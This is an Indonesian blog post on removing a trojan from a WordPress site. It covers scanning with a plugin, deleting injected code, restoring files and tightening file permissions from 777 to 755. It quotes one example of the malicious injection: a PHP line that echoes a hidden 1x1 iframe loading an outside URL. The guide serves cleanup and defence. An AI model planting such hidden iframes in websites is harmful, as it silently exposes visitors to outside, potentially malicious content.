CARA MEMBASMI VIRUS/TROJAN PADA WEBSITE/BLOG :
Berikut adalah cara membasmi virus/trojan yang mendekam agar tidak semakin merasuk ke berbagai file :
- Install plugin WordPress Exploit Scanner. Plugin ini ditest untuk WP versi 2.7.1 namun saya bisa menjalankannya pada WP 2.8.4. Setelah terinstall dan diaktivasi, akan ada menu tambahan pada bagian dashboard dengan nama : “Exploit Scanner”. Plugin ini akan melakukan pengecekan dan mendeteksi kode-kode tertentu yang dicurigai sebagai kode trojan. Mampu mendeteksi isi file maupun database. Perhatikan warning yang muncul jika terkait dengan file-file berikut : index.php, index.html, main.php, header.php, footer.php, termasuk jika ada indikasi susupan kode pada isi database
- Hapus bagian kode pada setiap file dab isi database yang mengandung kata “iframe” dan merujuk pada suatu alamat URL tertentu seperti contoh berikut ini (hati-hati menghapusnya karena ada juga contoh penggunaan iframe yang bukan virus, seperti iframe pada tampilan akismet) :
echo "<iframe src=\"h++p://internetcountercheck.com/?click=18998015" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";
- Update file yang terkena modifikasi dengan file yang sudah bersih
- Check ulang permission file. Ganti permission file dengan kode 777 (readable, writeable, executable untuk semua orang) menjadi 755. Hal ini bisa dilakukan menggunakan program FTP Client
- Akses ulang tampilan website/blog dan periksa page source. Check apakah benar kode yang dicurigai sudah dihilangkan.
Tidak ada komentar:
Posting Komentar